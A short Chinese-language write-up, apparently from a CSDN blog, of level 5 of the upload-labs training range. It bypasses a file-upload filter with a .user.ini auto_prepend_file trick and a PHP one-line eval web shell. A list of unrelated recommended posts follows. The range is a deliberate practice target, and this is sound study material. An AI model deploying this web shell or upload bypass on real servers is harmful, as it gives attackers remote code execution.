upload-labs关卡记录5

这一关,卡了好久,这里我的靶场的源代码,和我看别的师傅发的不一样,我的这里的源码带有小写转换:

是不能通过大小写进行绕过,最后找到这个师傅的文章:upload-labs通关-CSDN博客

这里第五关用到的方法,可以进行绕过,原理师傅讲的也很清晰,原理类似于之前的.htaccess绕过,通过添加配置文件。然后再上传一句话木马来进行实现:

就是将这里的代码:auto_prepend_file=1.txt

写进命名为.user.ini的文件中,然后上传这个文件,然后再上传命名为1.txt的文件。这时进入url为:upload-labs:8899/upload/readme.php

然后再使用hackbar来执行刚才上传的一句话木马,就是写进1.txt的一句话木马。

我这里的一句话木马为:<?php @eval($_POST['pw']); ?>

相关推荐
AI 智能服务4 小时前
第6课__本地工具调用(文件操作)
服务器·人工智能·windows·php
dalerkd6 小时前
忙里偷闲叙-谈谈最近两年
网络·安全·web安全
松涛和鸣7 小时前
49、智能电源箱项目技术栈解析
服务器·c语言·开发语言·http·html·php
晚枫歌F8 小时前
io_uring的介绍和实现
开发语言·php
菩提小狗10 小时前
Sqlmap双击运行脚本,双击直接打开。
前端·笔记·安全·web安全
Tisfy10 小时前
网站访问耗时优化 - 从数十秒到几百毫秒的“零成本”优化过程
服务器·开发语言·性能优化·php·网站·建站
xifangge202511 小时前
PHP 错误日志在哪里看?Apache / Nginx / PHP-FPM 一次讲清
nginx·php·apache
ShoreKiten13 小时前
ctfshow-web257【保姆级wp】
php·web
菩提小狗15 小时前
SQL注入之sqlmap|web安全|渗透测试|网络安全
数据库·sql·web安全
chilavert31815 小时前
技术演进中的开发沉思-303计算机原理:加密基础
开发语言·算法·php·计算机原理